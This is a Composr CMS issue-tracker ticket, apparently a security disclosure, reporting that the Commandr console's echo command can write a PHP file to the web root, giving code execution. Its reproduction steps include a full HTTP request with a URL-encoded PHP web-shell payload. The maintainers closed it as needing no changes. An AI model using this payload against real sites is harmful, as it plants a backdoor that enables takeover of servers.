#4833 - Ability To Upload FIles Using Commandr
| Identifier | #4833 |
|---|---|
| Issue type | Major issue (breaks an entire feature) |
| Title | Ability To Upload FIles Using Commandr |
| Status | Closed (no changes needed) |
| Tags |
Type: Security (custom) |
| Handling member | Chris Graham |
| Version | 10.0.41 |
| Addon | commandr |
| Description | Hello, I found an issue where it's possible to write files into the web root directory that allowed me to create a php file, which led to a code execution vulnerability. I wasn't sure if it actually was an issue at first but after i read about CVE-2021-46360 it seemed like this wasn't the intention for the commandr to allow this kind of executions. I still feel like i'm wrong so please tell me if this was intentional and not a bug. But if it is it will lead to Remote Code Execution. |
| Steps to reproduce | So the issue lies with the echo command where anyone can echo a file into the listed directories
here is the burp request
POST /composr/data/commandr.php?keep_session=90f2f9002e34b HTTP/1.1 Host: 192.168.43.139 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 156 Origin: http://192.168.43.139 Connection: close Referer: http://192.168.43.139/composr/adminzone/index.php?page=admin-cns-members&type=step1 Cookie: has_cookies=1; last_visit=1649622823; commandr_dir=Lw%3D%3D; cms_autosave__composr_cms_index_php_page_cms_banners_type__edit_id_advertise_here=1; cms_autosave__composr_cms_index_php_page_cms_galleries_type_add=1; cms_session__c76d12e8a128796e506566d626aace23=90f2f9002e34b
_data=command%3Decho%2620-e%2620%263C%263Fphp%2620system(%2624_REQUEST%265B%2Fc%2F%265D)%263B%2620%263E%2620%262Froot%262Fshell.php&csrf_token=90f2f9002e34b
|
| Funded? | No |
Comments
This was our response to what became CVE-2021-46360:
https://compo.sr/news/view/security-issues/clarifying-the-nature.htm